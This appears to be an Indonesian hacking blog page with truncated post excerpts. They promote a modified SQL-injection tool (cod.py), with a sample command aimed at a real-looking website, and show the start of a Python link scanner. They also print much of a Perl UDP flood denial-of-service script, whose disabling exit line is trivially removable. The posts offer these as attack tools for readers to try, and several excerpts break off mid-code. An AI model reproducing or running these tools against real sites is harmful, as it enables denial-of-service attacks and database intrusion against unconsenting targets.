Sekilas Blogs Owner
Gw Hanyalah Seorang Newbie Yang Suram dan seorang yang sangat kesepian tanpa pujaan hati, Tapi Lumayan Ganteng. Hard To Your Self and This Life Must Be Soft To You..
more...

satu lagi tools terbaik dari darkcode …. kek nah di modifikasi oleh devilzc0de crew… keren sob di coba yak …
download dulu source codenya di sini
klik di sini untuk download
cara kerjanya simple
contoh :
cod.py -sqli http://www.an.tv/s/?sid=5&programid=1521
ingat cod.py harus berada pada directory os yang tepat …
hasilnya dapat anda lihat di file flashjumperlog.txt yang akan tercipta dengan sendirinya jika [...]

scanlink.py

scanlink.py adalah software yang jalan di python …
ini sourcenya
import httplib,re,sys,optparse
def make_request(host,page):
try :
connection = httplib.HTTPConnection(host)
connection.request(“GET”,page)
r1 = connection.
VN:F [1.6.9_936]please wait…Rating: 0.0/10 (0 votes cast)VN:F [1.6.9_936]Rating: 0 (from 0 votes)

udp flood.

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# –/odix
#####################################################
# pseudo-crippled by packetstorm to stop script kiddies.
exit(0);
#
use Socket;
$ARGC=@ARGV;
if ($ARGC !=3) {
printf “$0 <ip> <port> <time>\n”;
printf “if arg1/2 =0, randports/continous packets.\n”;
exit(1);
}
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton(“$ip”);
printf “udp flood – odix\n”;
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system(“(sleep $time;killall [...]